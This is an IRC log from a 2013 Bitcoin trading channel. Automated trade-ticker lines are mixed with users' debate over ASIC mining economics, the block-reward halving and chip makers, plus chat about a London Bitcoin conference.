1.9926 BTC [-] Jul 04 19:23:59 sure it does Jul 04 19:24:06 I wonder why it had to be cut in half brutally Jul 04 19:24:13 and not a bit less for each block Jul 04 19:24:15 [BTCTC] [ASICMINER-PT] 2 @ 4.635 = 9.27 BTC [+] Jul 04 19:24:48 [BTCTC] [TAT.ASICMINER] 52 @ 0.0462 = 2.4024 BTC [+] Jul 04 19:25:05 this gives more stepped opportunity for stability Jul 04 19:25:23 but there's probly a better reason Jul 04 19:25:27 furuknap, bunch of other asic companies likely shipping in next months have much bigger influence than some halving Jul 04 19:25:50 [BTCTC] [ASICMINER-PT] 8 @ 4.61 = 36.88 BTC [-] Jul 04 19:25:52 no one is pricing the halving into anything right now, except you Jul 04 19:26:07 but you love factoring things that aren't factors Jul 04 19:26:29 and ignoring things that are Jul 04 19:27:10 jurov: No, because if AM has the hash power they claim on order, their relative hashrate will remain steady. Jul 04 19:27:27 [BTCTC] [ASICMINER-PT] 1 @ 4.601002 BTC [-] Jul 04 19:27:34 [BTCTC] [ASICMINER-PT] 1 @ 4.601 BTC [-] Jul 04 19:27:34 and what of hardware sales? Jul 04 19:27:39 [BTCTC] [ASICMINER-PT] 3 @ 4.6 = 13.8 BTC [-] Jul 04 19:27:39 not a factor? Jul 04 19:27:59 Sure it is. What will that be for the next three months, then? Jul 04 19:28:19 Because for AM to be even close to comparing to TAT.VM and BFMines, it would need to exceed mining income by about 10x. Jul 04 19:28:26 what will the effect of the halving be in 3mos? Jul 04 19:28:36 The issue, of course, is that AM will probably never go above 35%, meaning that no matter how little or much the hashrate grows, only costs will grow for AM, not income. Jul 04 19:28:47 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004349 = 0.0087 BTC [+] Jul 04 19:29:01 Very simple to factor in. Take today's price, divide by number of month until November 2016, multiply by three. Jul 04 19:29:13 ... Jul 04 19:29:25 Actually, take half of today's price. Jul 04 19:29:41 What's the point in that? Jul 04 19:29:44 i dont even know why i try Jul 04 19:29:50 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.004349 = 0.087 BTC [+] Jul 04 19:30:02 Because in *November 2016, AM income will go down by 50% unless TX fees compensate. Jul 04 19:30:31 Well technically it would go down to zero eventually without TX fees. Jul 04 19:30:33 you do realize, that by then, they will need to primarily serve as a hardware sales compeny anyway Jul 04 19:30:45 company* Jul 04 19:31:10 Again, sellig what? Miners will still need to get ROI which will be twice as difficult, so hardware sales will drop to half too. Jul 04 19:31:14 http://coin.furuknap.net/what-is-the-halving-effect-in-bitcoin-mining-investments/ Jul 04 19:31:17 What is the Halving Effect in Bitcoin Mining Investments? | Furuknap's Cryptocoin Blog Jul 04 19:31:37 [BTCTC] [TAT.ASICMINER] 11 @ 0.0462 = 0.5082 BTC [+] Jul 04 19:31:38 and what if the halving causes increase in fiat value? Jul 04 19:31:50 Well, what if it goes down to half? Jul 04 19:32:05 also, what if fees do increase due to devs not increasing blocksize? Jul 04 19:32:27 We've seen an insane increase in difficulty past three months and prices drop like rocks. There's no causuality between diff and price, and even correlation is in question. Jul 04 19:32:35 building any projection mostly oin halving seems foolish to me Jul 04 19:32:42 jurov; read through that article. Jul 04 19:33:17 there are too many variables Jul 04 19:33:20 furuknap, you're assuming ASICMINER doesn't get smaller process/better ASIC out over time, and that old hardware never goes bust, thus it's always going up. Jul 04 19:33:23 to even pretend you know what will happen Jul 04 19:33:42 Namworld: That what is going up? Jul 04 19:34:01 Difficulty Jul 04 19:34:15 Quite the contrary, I expect it to flatten out, probably much sooner than we realize. Jul 04 19:34:27 Only reason it keeps jumping up massively is CPU -> GPU -> FPGA -> ASIC Jul 04 19:34:40 Once ASIC are widely distributed, hashing growth rate should be more stable. Jul 04 19:34:56 the article silently assumes when you buy PMB-like stuff, you are buying some % of hashrate... but that couldn't be farther from the truth Jul 04 19:34:59 That is because of the halving effect; investments now have much shorter time before halving, so they can't be as high as they used to be. Jul 04 19:35:29 For example, if _only_ buying KnC Jupiters from now until February, we need to invest $200million to keep a 10% per change up. Jul 04 19:36:00 irl the % of global hashrate is very hard to maintain, for asicminer or anyone Jul 04 19:36:02 In Febraury, we're just over 1.5 years away from halving. Jul 04 19:36:18 [BTCTC] [ASICMINER-PT] 2 @ 4.60001 = 9.2 BTC [+] Jul 04 19:36:22 [BTCTC] [ASICMINER-PT] 5 @ 4.6 = 23 BTC [-] Jul 04 19:37:27 [BTCTC] [TAT.ASICMINER] 6 @ 0.0462 = 0.2772 BTC [+] Jul 04 19:37:35 when we will have trillions of asics on 20nm process and pace of development slows to moore's law, then it's possible on look forward to reward halvings Jul 04 19:37:48 Thus, it makes no sense to invest that much because the gains that can be had from that is not nearly enough to warrant the risk. Jul 04 19:38:26 KnC is already on 28nm and shipping in September. Jul 04 19:39:23 The cost to go from 28nm to 20nm is very high and someone needs to risk a huge amount of money to possibly succeed in reaping a 1:4 ratio on investment. I don't think you'll find many investors willing to risk that. Jul 04 19:39:53 yes. it knc and other can mass produce and ship, thus depressing hw prices overall, *after* that it will make sense projecting for halving Jul 04 19:39:58 *if knc Jul 04 19:40:26 how sure are you that KNC will ship? will their hardware be as good as they promised? Jul 04 19:40:32 BFL failed on the two Jul 04 19:40:32 Just a monent ago, you argued we'd have 20nm. Of course they, or someone, will succeed; they have to, otherwise Bitcoin mining is dead. Jul 04 19:41:03 and also BFL's shipping hardware will likely self-destruct Jul 04 19:41:12 Well honestly, I don't think the halving is what makes the biggest impact on this. The insanely high price of AM and lowering USD/BTC rate does. Jul 04 19:41:19 now i can only say the hw prices will drop like a stone, cusing severe dent in existing players' revenues and hashrate piece of cake Jul 04 19:41:44 and it can happen this year, this being of bigger concern than halving Jul 04 19:42:23 Jurov; for that to happen, the investments must be made. Would you invest $100 million in clothes to possibly sell up to $400 million in clothes, but very likely not sell anything? Jul 04 19:42:51 haven't they been made? Jul 04 19:43:51 No, the mass production isn't there by a long shot. Like I said, KnC (which are the most efficent miners as of now) must sell hardware for $200 million until FEbruary 2014 to maintain 10% network growth. They're not even close to that. Jul 04 19:44:08 once several parties will have a working design, all it takes is only making an order at tsmc Jul 04 19:44:11 [BTCTC] [ASICMINER-PT] 1 @ 4.62 BTC [+] Jul 04 19:44:13 or wherever Jul 04 19:44:14 knc is more efficient than fury? Jul 04 19:45:15 So either new tech comes along, which is very expensive, or KnC or someone like them must get much lower prices. The rates that brought AM to insane heights are miles away from being efficient enough now, just a few months after it was hailed as the cheapest possible chips on the planet. Jul 04 19:45:36 If they succeed, yes. Jul 04 19:45:51 If they don't, they're infinitely less efficient :-) Jul 04 19:45:51 [BTCTC] [ASICMINER-PT] 1 @ 4.560001 BTC [-] Jul 04 19:46:33 And that's the risk everyone runs; Even Bitfury missed massively, delivering only 2GH when he expected 5GH. Jul 04 19:46:42 my gox wires have been cancelled Jul 04 19:46:45 heh Jul 04 19:47:07 [BTCTC] [BFMINES] 9 @ 0.004 = 0.036 BTC Jul 04 19:47:09 Unlike with clothes, though, there's no smaller quantity for order; it's either $100 million or nothing, and your clothes may not even work. Jul 04 19:47:41 Damn, why is it that people put a 10-30% premium on calls/puts that expire in 1-7 days? That's way too much for too short periods. Jul 04 19:47:44 [BTCTC] [GSDPT] 1981 @ 0.00235 = 4.6554 BTC [-] Jul 04 19:48:14 [BTCTC] [GSDPT] 633 @ 0.002101 = 1.3299 BTC [-] Jul 04 19:48:17 [BTCTC] [GSDPT] 9 @ 0.002101 = 0.0189 BTC [-] Jul 04 19:48:48 All of this, BTW, is why I don't think difficulty will keep growing for very long; the risk to large investors (ie those that need to come along to fund next-next gen chips sub 28nm) is simply too great. Jul 04 19:48:49 [BTCTC] [ASICMINER-PT] 1 @ 4.561 BTC [+] Jul 04 19:48:51 [BTCTC] [GSDPT] 991 @ 0.002 = 1.982 BTC [-] Jul 04 19:48:58 Now I have to get back to work. Jul 04 19:49:49 Too great? AM could afford it no problem, probably. Jul 04 19:51:51 [BTCTC] [ASICMINER-PT] 7 @ 4.561 = 31.927 BTC [+] Jul 04 19:51:57 No, they won't because they don't have the money. AM isn't near having $100M in money because they pay out virtually everything they make in divs. Their tech is always based on prevoius generation, which is cheaper but not nearly efficient enough. Jul 04 19:52:18 you are delusional Jul 04 19:52:25 If you say so. Jul 04 19:52:55 so you think KnC can do things that AM can't? Jul 04 19:53:04 Sooner or later, I'll be right, though, like every prediction made far enough into the future. Jul 04 19:53:15 Yes, they can design a 28nm chip. AM's next gen is 65nm. Jul 04 19:53:30 i predict you'll be wrong about all your predictions in the future Jul 04 19:53:38 They'll probably skip 65nm... Jul 04 19:53:39 Hehe :-) Jul 04 19:53:55 They'll go right to the best option Jul 04 19:54:03 Friedcat said it would be 65nm, but I don't know if they changed their minds of course. Jul 04 19:54:12 even if they do 65nm Jul 04 19:54:15 Might have been a while ago. Jul 04 19:54:19 theyll r4elease it and sell it out before anyone else Jul 04 19:54:34 And once sold, does it matter? It's the buyer's loss Jul 04 19:54:41 Which is safe and fine, it's just a strategy of caution rather than risk. Great for investors looking for long-term profitability. Except for the halving effect, of course. Jul 04 19:54:46 [BTCTC] [ASICMINER-PT] 1 @ 4.561 BTC [+] Jul 04 19:55:10 If KnC comes out in September, do you really think AM can sell 65nm in October? Jul 04 19:55:22 [BTCTC] [ASICMINER-PT] 1 @ 4.561 BTC [+] Jul 04 19:56:40 Heck, Bitfury will be mass-producing his 55nm by then, and at that point, it will be a proven design which sells for a fraction of the cost of AM hardware. Jul 04 19:56:45 [BTCTC] [TAT.ASICMINER] 36 @ 0.0462 = 1.6632 BTC [+] Jul 04 19:57:20 We'll have to see about that, eheh Jul 04 19:57:25 The miners I bought for BFMines is priced at 5% of what AM blades are today (or were, until they were pulled off the market). Jul 04 19:57:48 [BTCTC] [PAJKA.BOND] 3 @ 0.055 = 0.165 BTC [-] Jul 04 19:58:04 Which miners are those? Jul 04 19:58:11 [BTCTC] [DMS.PURCHASE] 75 @ 0.049263 = 3.6947 BTC [-] Jul 04 19:58:12 Bitfury-based Metabank miners. Jul 04 19:58:28 anyone wants fury chips btw? Jul 04 19:58:41 [BTCTC] [ASICMINER-PT] 4 @ 4.56 = 18.24 BTC [-] Jul 04 19:58:46 Wouldn't know what to do with them :-) Jul 04 19:59:37 [BTCTC] [PAJKA.BOND] 5 @ 0.054 = 0.27 BTC [-] Jul 04 20:00:02 [BTCTC] [PAJKA.BOND] 5 @ 0.053 = 0.265 BTC [-] Jul 04 20:00:35 I recommend BTC-BOND. Just a flat 0.03% daily. 10.95% per year. I'd call that good returns. Jul 04 20:01:37 [BTCTC] [TAT.VIRTUALMINE] 28 @ 0.004349 = 0.1218 BTC [+] Jul 04 20:01:41 [BTCTC] [ASICMINER-PT] 10 @ 4.56 = 45.6 BTC [-] Jul 04 20:02:10 [BTCTC] [ASICMINER-PT] 1 @ 4.52221 BTC [-] Jul 04 20:02:15 [BTCTC] [ASICMINER-PT] 5 @ 4.5222 = 22.611 BTC [-] Jul 04 20:02:21 [BTCTC] [ASICMINER-PT] 2 @ 4.51001 = 9.02 BTC [-] Jul 04 20:02:27 [BTCTC] [ASICMINER-PT] 10 @ 4.51 = 45.1 BTC [-] Jul 04 20:03:04 [BTCTC] [ASICMINER-PT] 1 @ 4.5 BTC [-] Jul 04 20:04:32 [BTCTC] [GSDPT] 1 @ 0.0019 BTC [-] Jul 04 20:04:34 [BTCTC] [GSDPT] 2 @ 0.0018 = 0.0036 BTC [-] Jul 04 20:04:35 [BTCTC] [GSDPT] 170 @ 0.001705 = 0.2899 BTC [-] Jul 04 20:04:37 [BTCTC] [GSDPT] 642 @ 0.0017 = 1.0914 BTC [-] Jul 04 20:05:01 [BTCTC] [ASICMINER-PT] 8 @ 4.5 = 36 BTC [-] Jul 04 20:06:12 [BTCTC] [ASICMINER-PT] 1 @ 4.5 BTC [-] Jul 04 20:11:52 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.004349 = 0.0217 BTC [+] Jul 04 20:15:49 [BTCTC] [AMC-PT] 1 @ 0.002293 BTC [-] Jul 04 20:18:20 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.004349 = 0.0217 BTC [+] Jul 04 20:25:09 [BTCTC] [BFMINES] 5 @ 0.004 = 0.02 BTC Jul 04 20:26:39 http://www.huffingtonpost.com/2013/07/03/teen-jailed-facebook-comment-justin-carter-suicide-watch_n_3542770.html Jul 04 20:26:44 Justin Carter, Teen Jailed For Facebook Comment, Reportedly On Suicide Watch Jul 04 20:36:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.046 BTC [-] Jul 04 20:38:29 [BTCTC] [BITVPS] 10 @ 0.001901 = 0.019 BTC [-] Jul 04 20:38:31 [BTCTC] [BITVPS] 4 @ 0.0019 = 0.0076 BTC [-] Jul 04 20:38:32 [BTCTC] [BITVPS] 1 @ 0.001805 BTC [-] Jul 04 20:38:34 [BTCTC] [BITVPS] 10 @ 0.001804 = 0.018 BTC [-] Jul 04 20:38:35 [BTCTC] [BITVPS] 3 @ 0.001804 = 0.0054 BTC [-] Jul 04 20:38:35 [BTCTC] [BITVPS] 250 @ 0.001803 = 0.4508 BTC [-] Jul 04 20:38:38 [BTCTC] [BITVPS] 2 @ 0.0018 = 0.0036 BTC [-] Jul 04 20:38:39 [BTCTC] [BITVPS] 2 @ 0.0018 = 0.0036 BTC [-] Jul 04 20:38:41 [BTCTC] [BITVPS] 1 @ 0.0017 BTC [-] Jul 04 20:38:42 [BTCTC] [BITVPS] 1 @ 0.0017 BTC [-] Jul 04 20:38:43 [BTCTC] [BITVPS] 26 @ 0.001512 = 0.0393 BTC [-] Jul 04 20:38:45 [BTCTC] [BITVPS] 26 @ 0.001512 = 0.0393 BTC [-] Jul 04 20:38:46 [BTCTC] [BITVPS] 90 @ 0.00151 = 0.1359 BTC [-] Jul 04 20:38:47 [BTCTC] [BITVPS] 28 @ 0.001501 = 0.042 BTC [-] Jul 04 20:38:48 [BTCTC] [BITVPS] 28 @ 0.001501 = 0.042 BTC [-] Jul 04 20:38:49 [BTCTC] [BITVPS] 56 @ 0.001501 = 0.0841 BTC [-] Jul 04 20:38:50 [BTCTC] [BITVPS] 10 @ 0.001251 = 0.0125 BTC [-] Jul 04 20:38:51 [BTCTC] [BITVPS] 50 @ 0.00121 = 0.0605 BTC [-] Jul 04 20:38:52 [BTCTC] [BITVPS] 10 @ 0.0012 = 0.012 BTC [-] Jul 04 20:38:53 [BTCTC] [BITVPS] 10 @ 0.0012 = 0.012 BTC [-] Jul 04 20:38:54 [BTCTC] [BITVPS] 700 @ 0.001102 = 0.7714 BTC [-] Jul 04 20:39:15 [BTCTC] [BTC-BOND] 100 @ 0.009903 = 0.9903 BTC [-] Jul 04 20:39:26 [BTCTC] [ASICMINER-PT] 1 @ 4.558999 BTC [+] Jul 04 20:39:48 [BTCTC] [BTC-BOND] 10 @ 0.009902 = 0.099 BTC [-] Jul 04 20:40:22 [BTCTC] [DMS.MINING] 2 @ 0.0206 = 0.0412 BTC [+] Jul 04 20:41:31 [BTCTC] [BTC-BOND] 723 @ 0.009902 = 7.1591 BTC [-] Jul 04 20:41:43 [BTCTC] [TAT.ASICMINER] 31 @ 0.046 = 1.426 BTC [-] Jul 04 20:46:39 [BTCTC] [BFMINES] 5 @ 0.004 = 0.02 BTC Jul 04 20:51:14 [BTCTC] [AMC-PT] 100 @ 0.00215 = 0.215 BTC [-] Jul 04 20:52:41 o/ evoorhees! Jul 04 20:52:58 hello Jul 04 20:53:38 How are you today? Jul 04 20:55:58 I'm good thanks Jul 04 20:56:24 Good good! Jul 04 20:56:48 You god damn better believe..in Bam M. http://www.dailymotion.com/video/xehca_cky-skeletor-vs-beastman_music Jul 04 20:56:51 last night I got back from the london conference, it was fantastic Jul 04 20:57:43 Damn, I wanted to be there so badly, but I couldn't in such short notice, anything really good I missed? Jul 04 20:57:51 how'd it differ from the US con? Jul 04 21:00:13 [BTCTC] [AMC-PT] 1 @ 0.002295 BTC [+] Jul 04 21:01:12 how did it differ? it was much more b2b focused Jul 04 21:01:25 the san jose event was more like an enthusiast gathering Jul 04 21:01:32 [BTCTC] [S.DICE-PT] 20 @ 0.0024 = 0.048 BTC [-] Jul 04 21:01:32 london was more like business people gathering to network Jul 04 21:01:38 it was a little more intimante, and only one day Jul 04 21:01:57 sounds way better. Jul 04 21:02:19 both were awesome I must say Jul 04 21:02:24 Damn, now you are making me jealous, I really wanted to be there, maybe next year... Jul 04 21:02:51 london conference was very professionally done Jul 04 21:02:53 amazing venue Jul 04 21:03:05 we were on like 40th floor, looking down on the JP Morgan tower ;) Jul 04 21:03:12 [BTCTC] [BTC-BOND] 20 @ 0.01 = 0.2 BTC [+] Jul 04 21:03:48 Where was the stay? Jul 04 21:05:03 so evoorhees, anything great comming out of that meet? Jul 04 21:07:19 yeah there are good things coming, and great connections were made Jul 04 21:07:32 were the scamstamp guys there too? Jul 04 21:07:40 I've been to three conferences now I think, and the level of professionalism gets better and better Jul 04 21:08:00 the quality of the entrepreneurs is improving... the general talent is getting better Jul 04 21:08:16 probably just since bitcoin is moving out of hobbyist world into professional finance Jul 04 21:08:25 scamstamp? Jul 04 21:08:43 sorry i ment bitstamp Jul 04 21:08:54 they scammed someone? Jul 04 21:09:10 eh they have been doing it for years with their broked trading engine Jul 04 21:12:10 was pirate invited too? Jul 04 21:12:24 [BTCTC] [BFMINES] 45 @ 0.004 = 0.18 BTC Jul 04 21:14:00 [BTCTC] [TAT.ASICMINER] 35 @ 0.046 = 1.61 BTC [-] Jul 04 21:14:27 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.004349 = 0.0174 BTC [+] Jul 04 21:16:39 [BTCTC] [ASICMINER-PT] 1 @ 4.56 BTC [+] Jul 04 21:19:02 [BTCTC] [DMS.MINING] 23 @ 0.0206 = 0.4738 BTC [+] Jul 04 21:19:31 [BTCTC] [DMS.MINING] 1 @ 0.020786 BTC [+] Jul 04 21:19:33 [BTCTC] [DMS.MINING] 24 @ 0.020786 = 0.4989 BTC [+] Jul 04 21:20:57 [BTCTC] [S.BBET-PT] 50 @ 0.00185 = 0.0925 BTC [-] Jul 04 21:21:27 24 hours and roughly 25% of BFMines IPO sold. I'm not disappointed, even though that includes 5% for myself. Jul 04 21:23:36 [BTCTC] [ASICMINER-PT] 1 @ 4.579999 BTC [+] Jul 04 21:23:40 [BTCTC] [ASICMINER-PT] 3 @ 4.58 = 13.74 BTC [+] Jul 04 21:23:47 [BTCTC] [ASICMINER-PT] 3 @ 4.599999 = 13.8 BTC [+] Jul 04 21:23:52 [BTCTC] [ASICMINER-PT] 2 @ 4.6 = 9.2 BTC [+] Jul 04 21:23:57 [BTCTC] [ASICMINER-PT] 10 @ 4.61 = 46.1 BTC [+] Jul 04 21:24:05 [BTCTC] [ASICMINER-PT] 8 @ 4.612 = 36.896 BTC [+] Jul 04 21:24:13 [BTCTC] [ASICMINER-PT] 1 @ 4.635 BTC [+] Jul 04 21:24:19 [BTCTC] [ASICMINER-PT] 10 @ 4.69 = 46.9 BTC [+] Jul 04 21:24:57 [BTCTC] [ASICMINER-PT] 4 @ 4.69999 = 18.8 BTC [+] Jul 04 21:30:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.046 BTC [-] Jul 04 21:33:42 [BTCTC] [DMS.MINING] 53 @ 0.0199 = 1.0547 BTC [-] Jul 04 21:35:27 [BTCTC] [DMS.SELLING] 20 @ 0.02902 = 0.5804 BTC [+] Jul 04 21:35:29 [BTCTC] [DMS.SELLING] 32 @ 0.02902 = 0.9286 BTC [+] Jul 04 21:36:06 [BTCTC] [DMS.PURCHASE] 65 @ 0.049263 = 3.2021 BTC [-] Jul 04 21:40:13 [BTCTC] [TAT.ASICMINER] 10 @ 0.046 = 0.46 BTC [-] Jul 04 21:45:49 [BTCTC] [TAT.ASICMINER] 9 @ 0.046 = 0.414 BTC [-] Jul 04 21:46:34 [BTCTC] [DMS.SELLING] 20 @ 0.02901 = 0.5802 BTC [-] Jul 04 21:46:36 [BTCTC] [DMS.SELLING] 4 @ 0.029 = 0.116 BTC [-] Jul 04 21:47:03 [BTCTC] [DMS.MINING] 2 @ 0.02 = 0.04 BTC [+] Jul 04 21:47:05 [BTCTC] [DMS.MINING] 88 @ 0.0198 = 1.7424 BTC [-] Jul 04 21:47:40 [BTCTC] [B.YABMC] 6 @ 0.0055 = 0.033 BTC [-] Jul 04 21:50:30 [BTCTC] [DMS.MINING] 2 @ 0.0198 = 0.0396 BTC [-] Jul 04 21:50:31 [BTCTC] [DMS.MINING] 40 @ 0.019301 = 0.772 BTC [-] Jul 04 21:50:32 [BTCTC] [DMS.MINING] 86 @ 0.019301 = 1.6599 BTC [-] Jul 04 21:50:34 [BTCTC] [DMS.MINING] 46 @ 0.0193 = 0.8878 BTC [-] Jul 04 21:54:39 [BTCTC] [ASICMINER-PT] 1 @ 4.500003 BTC [-] Jul 04 21:55:16 [BTCTC] [ASICMINER-PT] 3 @ 4.500002 = 13.5 BTC [-] Jul 04 21:55:22 [BTCTC] [ASICMINER-PT] 10 @ 4.5 = 45 BTC [-] Jul 04 21:56:25 [BTCTC] [TAT.ASICMINER] 8 @ 0.046 = 0.368 BTC [-] Jul 04 21:57:15 [BTCTC] [AMC-PT] 300 @ 0.00215 = 0.645 BTC [-] Jul 04 21:57:17 [BTCTC] [AMC-PT] 1500 @ 0.00215 = 3.225 BTC [-] Jul 04 21:58:19 [BTCTC] [BASIC-MINING] 1 @ 0.156 BTC [+] Jul 04 21:58:21 [BTCTC] [BASIC-MINING] 2 @ 0.156 = 0.312 BTC [+] Jul 04 21:59:26 lol kakobrekla, seems evoorhees isn't interested in such discussions at all Jul 04 21:59:40 [BTCTC] [S.DICE-PT] 30 @ 0.0024 = 0.072 BTC [-] Jul 04 22:00:57 anyway evoorhees, i'd like to know if anything tangible came out of the conference, for s.dice or else Jul 04 22:01:46 well yeah jurov the polite thing is to turn away when you see a scam i think Jul 04 22:01:58 and he is polite fella Jul 04 22:02:49 [BTCTC] [COGNITIVE] 1 @ 0.323 BTC [+] Jul 04 22:02:59 [BTCTC] [DMS.SELLING] 26 @ 0.029 = 0.754 BTC [-] Jul 04 22:02:59 [BTCTC] [COGNITIVE] 4 @ 0.3222 = 1.2888 BTC [-] Jul 04 22:03:01 [BTCTC] [COGNITIVE] 6 @ 0.3221 = 1.9326 BTC [-] Jul 04 22:03:03 [BTCTC] [COGNITIVE] 1 @ 0.322 BTC [-] Jul 04 22:04:16 [BTCTC] [COGNITIVE] 15 @ 0.321195 = 4.8179 BTC [-] Jul 04 22:04:36 well raised sort of thing. unlike me, slovenly unadjusted animal Jul 04 22:06:23 [BTCTC] [COGNITIVE] 3 @ 0.321195 = 0.9636 BTC [-] Jul 04 22:06:33 [BTCTC] [COGNITIVE] 3 @ 0.321194 = 0.9636 BTC [-] Jul 04 22:06:35 [BTCTC] [COGNITIVE] 11 @ 0.32101 = 3.5311 BTC [-] Jul 04 22:07:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.046 BTC [-] Jul 04 22:08:59 [BTCTC] [COGNITIVE] 11 @ 0.305 = 3.355 BTC [-] Jul 04 22:10:18 [BTCTC] [TAT.ASICMINER] 10 @ 0.045651 = 0.4565 BTC [-] Jul 04 22:10:19 [BTCTC] [TAT.ASICMINER] 75 @ 0.04565 = 3.4238 BTC [-] Jul 04 22:10:22 [BTCTC] [TAT.ASICMINER] 52 @ 0.045643 = 2.3734 BTC [-] Jul 04 22:11:02 [BTCTC] [AMC-PT] 400 @ 0.002125 = 0.85 BTC [-] Jul 04 22:11:04 [BTCTC] [AMC-PT] 50 @ 0.0021 = 0.105 BTC [-] Jul 04 22:11:05 [BTCTC] [AMC-PT] 20 @ 0.0021 = 0.042 BTC [-] Jul 04 22:11:07 [BTCTC] [AMC-PT] 330 @ 0.002025 = 0.6683 BTC [-] Jul 04 22:11:08 [BTCTC] [AMC-PT] 648 @ 0.002009 = 1.3018 BTC [-] Jul 04 22:11:09 [BTCTC] [AMC-PT] 92 @ 0.002009 = 0.1848 BTC [-] Jul 04 22:11:10 [BTCTC] [AMC-PT] 60 @ 0.002007 = 0.1204 BTC [-] Jul 04 22:11:12 [BTCTC] [AMC-PT] 20 @ 0.002007 = 0.0401 BTC [-] Jul 04 22:11:13 [BTCTC] [AMC-PT] 100 @ 0.002001 = 0.2001 BTC [-] Jul 04 22:11:14 [BTCTC] [AMC-PT] 450 @ 0.002 = 0.9 BTC [-] Jul 04 22:11:15 [BTCTC] [AMC-PT] 100 @ 0.002 = 0.2 BTC [-] Jul 04 22:11:15 [BTCTC] [AMC-PT] 500 @ 0.002 = 1 BTC [-] Jul 04 22:12:47 [BTCTC] [BASIC-MINING] 1 @ 0.1551 BTC [-] Jul 04 22:12:49 [BTCTC] [BASIC-MINING] 1 @ 0.155 BTC [-] Jul 04 22:12:51 [BTCTC] [BASIC-MINING] 3 @ 0.155 = 0.465 BTC [-] Jul 04 22:12:53 [BTCTC] [BASIC-MINING] 1 @ 0.154 BTC [-] Jul 04 22:12:54 [BTCTC] [BASIC-MINING] 4 @ 0.154 = 0.616 BTC [-] Jul 04 22:12:56 [BTCTC] [BASIC-MINING] 5 @ 0.154 = 0.77 BTC [-] Jul 04 22:12:57 [BTCTC] [BASIC-MINING] 9 @ 0.153331 = 1.38 BTC [-] Jul 04 22:12:59 [BTCTC] [BASIC-MINING] 13 @ 0.153001 = 1.989 BTC [-] Jul 04 22:13:33 http://www.bbc.co.uk/nature/23150941 Jul 04 22:13:36 BBC Nature - Cockatoos crack lock-picking puzzle Jul 04 22:13:47 [BTCTC] [TAT.ASICMINER] 4 @ 0.045642 = 0.1826 BTC [-] Jul 04 22:13:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.045641 BTC [-] Jul 04 22:13:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.045641 BTC [-] Jul 04 22:13:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.045641 BTC [-] Jul 04 22:13:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.045641 BTC [-] Jul 04 22:13:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.045641 BTC [-] Jul 04 22:13:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.045641 BTC [-] Jul 04 22:13:59 [BTCTC] [TAT.ASICMINER] 12 @ 0.04564 = 0.5477 BTC [-] Jul 04 22:14:29 now teach them to factorize primes :D Jul 04 22:15:35 or to hash Jul 04 22:15:52 [BTCTC] [AMC-PT] 250 @ 0.001999 = 0.4998 BTC [-] Jul 04 22:15:54 [BTCTC] [AMC-PT] 50 @ 0.00195 = 0.0975 BTC [-] Jul 04 22:15:55 [BTCTC] [AMC-PT] 130 @ 0.001942 = 0.2525 BTC [-] Jul 04 22:16:17 coming soon: COCKATOOMINER Jul 04 22:16:37 but what to do with all that cockapoo? Jul 04 22:17:03 and how will the halving affect this enterprise? Jul 04 22:17:32 [BTCTC] [TAT.ASICMINER] 43 @ 0.04564 = 1.9625 BTC [-] Jul 04 22:17:36 [BTCTC] [TAT.ASICMINER] 3 @ 0.04564 = 0.1369 BTC [-] Jul 04 22:18:02 [BTCTC] [ASICMINER-PT] 2 @ 4.5 = 9 BTC [-] Jul 04 22:19:46 [BTCTC] [DMS.MINING] 1 @ 0.019301 BTC [+] Jul 04 22:24:10 [BTCTC] [B.YABMC] 1 @ 0.005 BTC [-] Jul 04 22:32:27 [BTCTC] [BFMINES] 1 @ 0.004 BTC Jul 04 22:40:55 [BTCTC] [ASICMINER-PT] 1 @ 4.481 BTC [-] Jul 04 22:40:59 [BTCTC] [ASICMINER-PT] 1 @ 4.48 BTC [-] Jul 04 22:43:19 [BTCTC] [TAT.ASICMINER] 8 @ 0.04564 = 0.3651 BTC [-] Jul 04 22:44:10 [MPEX] [S.MPOE] 4800 @ 0.00077679 = 3.7286 BTC [-] Jul 04 22:44:58 [BTCTC] [TAT.ASICMINER] 11 @ 0.04555 = 0.5011 BTC [-] Jul 04 22:48:30 https://bitcointalk.org/index.php?topic=5441.msg2655649#msg2655649 Jul 04 22:48:36 BitMarket.Eu has closed down. A new secure site Bitalo.com is coming soon. Jul 04 22:48:59 [BTCTC] [TAT.ASICMINER] 77 @ 0.045125 = 3.4746 BTC [-] Jul 04 22:49:56 [BTCTC] [DMS.SELLING] 10 @ 0.029 = 0.29 BTC [-] Jul 04 22:50:17 [BTCTC] [TAT.ASICMINER] 4 @ 0.045125 = 0.1805 BTC [-] Jul 04 22:56:21 [BTCTC] [TAT.ASICMINER] 3 @ 0.045126 = 0.1354 BTC [+] Jul 04 23:00:19 [BTCTC] [TAT.ASICMINER] 8 @ 0.046099 = 0.3688 BTC [+] Jul 04 23:01:40 [BTCTC] [TAT.ASICMINER] 4 @ 0.0461 = 0.1844 BTC [+] Jul 04 23:04:31 [BTCTC] [BFMINES] 5 @ 0.004 = 0.02 BTC Jul 04 23:04:52 [BTCTC] [TAT.ASICMINER] 41 @ 0.0461 = 1.8901 BTC [+] Jul 04 23:04:54 [BTCTC] [TAT.ASICMINER] 7 @ 0.0461 = 0.3227 BTC [+] Jul 04 23:11:58 [BTCTC] [BTC-BOND] 12 @ 0.01 = 0.12 BTC [+] Jul 04 23:30:22 [BTCTC] [ASICMINER-PT] 5 @ 4.48 = 22.4 BTC [-] Jul 04 23:36:13 [BTCTC] [BASIC-MINING] 20 @ 0.153001 = 3.06 BTC [-] Jul 04 23:41:02 [MPEX] [S.MPOE] 8000 @ 0.00077679 = 6.2143 BTC [-] Jul 04 23:41:04 [MPEX] [S.MPOE] 5860 @ 0.00077829 = 4.5608 BTC [+] Jul 04 23:41:10 [MPEX] [S.MPOE] 1681 @ 0.00077859 = 1.3088 BTC [+] Jul 04 23:42:08 [BTCTC] [DMS.SELLING] 37 @ 0.029 = 1.073 BTC [-] Jul 04 